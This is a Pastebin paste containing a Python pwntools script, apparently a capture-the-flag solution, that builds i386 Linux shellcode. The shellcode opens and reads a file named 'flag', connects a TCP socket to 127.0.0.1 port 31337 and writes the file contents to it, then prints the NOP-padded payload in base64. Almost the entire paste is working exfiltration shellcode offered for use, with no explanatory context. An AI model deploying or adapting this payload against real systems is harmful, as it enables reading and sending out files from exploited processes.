Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- context(os='linux', arch='i386')
- shellcode = '''
- // openat
- xor eax, eax
- push eax
- push 0x67616c66
- mov ebx, -100
- mov ecx, esp
- xor edx, edx
- xor esi, esi
- mov ax, 0x127
- int 0x80
- // readv
- mov ebx, eax
- mov ax, 0x100
- push eax
- mov ecx, esp
- inc ecx
- inc ecx
- inc ecx
- inc ecx
- push ecx
- mov ecx, esp
- xor edx, edx
- inc edx
- xor eax, eax
- mov al, 0x91
- int 0x80
- // socket(2, 1, 6);
- xor eax, eax
- xor ebx, ebx
- xor ecx, ecx
- push ecx
- mov cl, 6
- push ecx
- mov cl, 1
- push ecx
- mov cl, 2
- push ecx
- mov ecx, esp
- mov bl, 1
- mov al, 102
- int 0x80
- //connect(sock, sockaddr, 16)
- mov edx, eax
- xor eax, eax
- xor ecx, ecx
- push ecx
- push ecx
- push 0x0100007f // 127.0.0.1
- pushw 0x697a // 31337
- mov cl, 2
- pushw cx
- mov edi, esp
- mov bl, 16
- push ebx
- push edi
- push edx
- mov ecx, esp
- mov bl, 3
- mov al, 102
- int 0x80
- // writev
- mov ebx, edx
- lea ecx, [esp+0x2c]
- xor eax, eax
- mov dl, 1
- mov al, 0x92
- int 0x80
- '''
- payload = asm(shellcode)
- payload = payload.ljust(0x100, '\x90')
- print payload.encode('base64')
Add Comment
Please, Sign In to add comment